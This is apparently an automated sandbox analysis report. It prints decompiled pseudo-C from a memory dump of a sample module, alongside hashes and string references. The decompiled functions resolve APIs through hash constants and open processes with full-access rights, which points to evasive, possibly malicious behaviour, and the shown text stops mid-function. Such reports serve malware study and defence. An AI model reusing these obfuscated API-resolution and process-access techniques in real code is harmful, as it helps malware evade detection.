0x6f501cf7
0x6f501cff
0x6f501d04
0x6f501d0d
0x6f501d15
0x6f501d2a

Strings

8nsK, xrefs: 6F501900

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 1dae7d99bed8eb66529ded8d7f94ce2f019e469d851fd4bcf34003586c137c58
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: E5323772414B069AC705EF20C8919EF77E0EFE1208F104B2DB9895A1E2FF71ED86D695

Uniqueness

Uniqueness Score: -1.00%

Function 6F50A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6F50A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6F50B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6F50F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6F50F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6F512234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6F50F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6F50F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6F50F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6f51b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6F513064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6F50F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6F50B5C4(_t439 + 0x34);
											E6F50B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6F50B5C4(_t439 + 0x34);
										E6F50B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6F50F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6F50CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6F50C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6F50F828(_t439 + 0x14, E6F50F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6F50F4BC(_t439 + 0x14, E6F50F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6F513064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6F50F828(_t439 + 0x40, E6F50F4CC(_t439 + 0x3c) + 4);
											 *(E6F50F4BC(_t439 + 0x40, E6F50F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6F50CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6F50F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6F50F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6F50AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6F50CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6F50F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6F50F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6F50F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6F50F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6F5138F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6F50F828( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6F50F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6F50F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6F5138F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6F50F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6F50F828( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6F50F828( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6F50F4BC( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6F50F828( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 4);
								 *(E6F50F4BC( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6F50F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6F513064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6F50F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6F50F828( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6F50F4BC( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6F50F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6F50F828( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 4);
										 *(E6F50F4BC( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6F50F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6F50F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6F50F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6F50F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6F5138F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6F50F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6F50F828( *((intOrPtr*)(_t439 + 4)), E6F50F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6F513064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6F50F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6F50F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6F50F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6F50F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6F50F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6F5138F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6F50F828( *((intOrPtr*)(_t439 + 8)), E6F50F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F50F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6f50a4f2
0x6f50a4f4
0x6f50a4ff
0x6f50a505
0x6f50a509
0x6f50a50e
0x6f50a514
0x6f50a524
0x00000000
0x6f50a526
0x6f50a526
0x6f50a531
0x6f50a531
0x6f50aaaf
0x6f50aab1
0x6f50aab2
0x6f50aaf1
0x6f50aaf5
0x6f50ab03
0x6f50ab11
0x6f50ab11
0x6f50aafc
0x6f50ab17
0x6f50ab1c
0x00000000
0x6f50ab1c
0x6f50ab00
0x6f50ab01
0x00000000
0x6f50a53b
0x6f50a53b
0x6f50a53f
0x6f50a646
0x6f50a646
0x6f50a64b
0x6f50a75c
0x6f50a760
0x6f50a765
0x6f50a769
0x6f50a893
0x6f50a895
0x6f50a899
0x6f50a8a2
0x6f50a8ab
0x6f50a8af
0x6f50a8b8
0x6f50a8bf
0x6f50a8c0
0x6f50a8c4
0x6f50a8c8
0x6f50a8cc
0x6f50a8ce
0x6f50aa38
0x6f50aa38
0x6f50aa40
0x6f50aa58
0x6f50aa5a
0x6f50aa5c
0x6f50aa96
0x6f50aa96
0x6f50aa98
0x6f50aa98
0x6f50aa9b
0x6f50aab6
0x6f50aaca
0x6f50aacd
0x6f50aad2
0x6f50aadd
0x6f50aade
0x6f50aae1
0x6f50aae3
0x6f50aaec
0x00000000
0x6f50aaec
0x6f50aa9d
0x6f50aaa1
0x6f50aaaa
0x00000000
0x6f50aaaa
0x6f50aa6d
0x6f50aa7d
0x6f50aa81
0x6f50aa81
0x6f50aa84
0x6f50aa87
0x6f50aa8a
0x6f50aa90
0x00000000
0x00000000
0x00000000
0x6f50aa92
0x6f50a8d6
0x6f50a8d6
0x6f50a8d8
0x6f50a8dc
0x6f50a8e1
0x6f50a8e3
0x6f50a8e7
0x6f50a8ea
0x6f50a8f2
0x6f50a8f4
0x00000000
0x00000000
0x6f50a90b
0x6f50a926
0x6f50a928
0x6f50a93b
0x6f50a93d
0x6f50a93f
0x6f50a95a
0x6f50a95a
0x6f50a95e
0x6f50a960
0x00000000
0x00000000
0x6f50a962
0x6f50a965
0x6f50a986
0x6f50a9a5
0x6f50a9ab
0x6f50a9ae
0x6f50a9b3
0x6f50a9b4
0x6f50a9b8
0x00000000
0x00000000
0x6f50a9c0
0x6f50a9c0
0x6f50a9c2
0x6f50a9ce
0x6f50a9da
0x6f50a9e4
0x6f50a9e7
0x6f50a9ea
0x6f50a9ee
0x6f50a9f5
0x6f50a9f9
0x6f50a9fd
0x6f50a9fe
0x6f50aa02
0x6f50aa07
0x6f50aa0c
0x6f50aa10
0x6f50aa14
0x6f50aa1a
0x6f50aa20
0x6f50aa26
0x6f50aa2c
0x6f50aa31
0x6f50aa32
0x6f50aa32
0x00000000
0x6f50a9c2
0x00000000
0x6f50a965
0x6f50a943
0x6f50a954
0x6f50a956
0x6f50a958
0x00000000
0x00000000
0x00000000
0x6f50a958
0x6f50a96b
0x00000000
0x6f50a96b
0x6f50a76f
0x6f50a772
0x6f50a774
0x00000000
0x00000000
0x6f50a77c
0x6f50a77c
0x6f50a77e
0x6f50a77e
0x6f50a78f
0x6f50a791
0x6f50a794
0x00000000
0x00000000
0x6f50a88a
0x6f50a88b
0x6f50a88d
0x00000000
0x00000000
0x00000000
0x6f50a88d
0x6f50a79a
0x6f50a79d
0x6f50a7a7
0x6f50a7ac
0x6f50a7ae
0x6f50a7b4
0x6f50a7bb
0x6f50a7bf
0x6f50a7c4
0x6f50a7c8
0x6f50ac03
0x6f50ac17
0x6f50ac3a
0x6f50ac3f
0x6f50ac3f
0x6f50a7df
0x6f50a7e4
0x6f50a7e4
0x6f50a7e4
0x6f50a7e4
0x6f50a7ea
0x6f50a7ef
0x6f50a7f1
0x6f50a7f6
0x6f50a7fd
0x6f50a802
0x6f50a804
0x6f50abc1
0x6f50abd2
0x6f50abec
0x6f50abf1
0x6f50abf1
0x6f50a81a
0x6f50a81f
0x6f50a81f
0x6f50a81f
0x6f50a81f
0x6f50a833
0x6f50a851
0x6f50a856
0x6f50a866
0x6f50a883
0x6f50a885
0x6f50a885
0x00000000
0x6f50a79d
0x6f50a653
0x6f50a653
0x6f50a655
0x6f50a65c
0x6f50a66a
0x6f50a66c
0x6f50a66f
0x6f50a676
0x6f50a678
0x6f50a6a9
0x6f50a6b8
0x6f50a6ba
0x6f50a6bc
0x6f50a6da
0x6f50a6dc
0x6f50a6de
0x6f50a6f1
0x6f50a710
0x6f50a716
0x6f50a719
0x6f50a730
0x6f50a74c
0x6f50a74e
0x6f50a74e
0x6f50a74e
0x6f50a74e
0x6f50a6de
0x00000000
0x6f50a6bc
0x6f50a67c
0x6f50a67c
0x6f50a67e
0x6f50a68f
0x6f50a691
0x6f50a693
0x00000000
0x00000000
0x6f50a69f
0x6f50a6a0
0x6f50a6a7
0x00000000
0x00000000
0x00000000
0x6f50a6a7
0x6f50a695
0x6f50a698
0x00000000
0x00000000
0x6f50a751
0x6f50a751
0x6f50a752
0x6f50a752
0x00000000
0x6f50a545
0x6f50a547
0x6f50a547
0x6f50a549
0x6f50a550
0x6f50a55e
0x6f50a560
0x6f50a564
0x6f50a568
0x6f50a56a
0x6f50a598
0x6f50a59b
0x6f50a5a0
0x6f50a5a4
0x6f50a5a9
0x6f50a5b0
0x6f50a5b5
0x6f50a5b7
0x6f50ab7e
0x6f50ab8f
0x6f50abaf
0x6f50abb4
0x6f50abb4
0x6f50a5cd
0x6f50a5d2
0x6f50a5d2
0x6f50a5d2
0x6f50a5d2
0x6f50a5e4
0x6f50a5e6
0x6f50a5e8
0x6f50a5f9
0x6f50a5f9
0x6f50a5ff
0x6f50a604
0x6f50a608
0x6f50a60e
0x6f50a615
0x6f50a61a
0x6f50a61c
0x6f50ab32
0x6f50ab43
0x6f50ab64
0x6f50ab69
0x6f50ab69
0x6f50a633
0x6f50a638
0x6f50a638
0x6f50a638
0x6f50a638
0x6f50a63b
0x6f50a63b
0x00000000
0x6f50a63b
0x6f50a56e
0x6f50a56e
0x6f50a570
0x6f50a581
0x6f50a583
0x6f50a585
0x00000000
0x00000000
0x6f50a591
0x6f50a592
0x6f50a596
0x00000000
0x00000000
0x00000000
0x6f50a596
0x6f50a587
0x6f50a58a
0x00000000
0x00000000
0x6f50a63c
0x6f50a63c
0x6f50a63d
0x6f50a63d
0x00000000
0x6f50a549
0x6f50a53f

Strings

, xrefs: 6F50AAF7

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b897e38de45f9d8ce2b863e16dba3707657465a798780fe9806c831fe7996def
Instruction ID: 175546eb78337b96c437710e1bddb164990d9a9129d17d4b38fe2d315463f7da
Opcode Fuzzy Hash: b897e38de45f9d8ce2b863e16dba3707657465a798780fe9806c831fe7996def
Instruction Fuzzy Hash: D91249725087019FC754FF24C980A6EB7E5EFC5718F018A3DE999972A1EB30AD01CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6F508428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6F508428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6F50B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6F50F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6F50F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6F512234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6F50F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6F50F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6F50F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6F50F4BC(_t449 + 0x14, 0);
									_t180 = E6F512908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6F50B5C4(_t449 + 0x34);
										E6F50B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6F50F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6F50F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6F50B5C4(_t449 + 0x34);
										E6F50B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6F50CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6F50C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6F50F828(_t449 + 0x14, E6F50F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6F50F4BC(_t449 + 0x14, E6F50F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6F513064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6F50F828(_t449 + 0x40, E6F50F4CC(_t449 + 0x3c) + 4);
											 *(E6F50F4BC(_t449 + 0x40, E6F50F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6F50CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6F50F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6F50F4BC(_t449 + 0x40, _t431 * 4);
												E6F508B58( *_t211, E6F5102B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
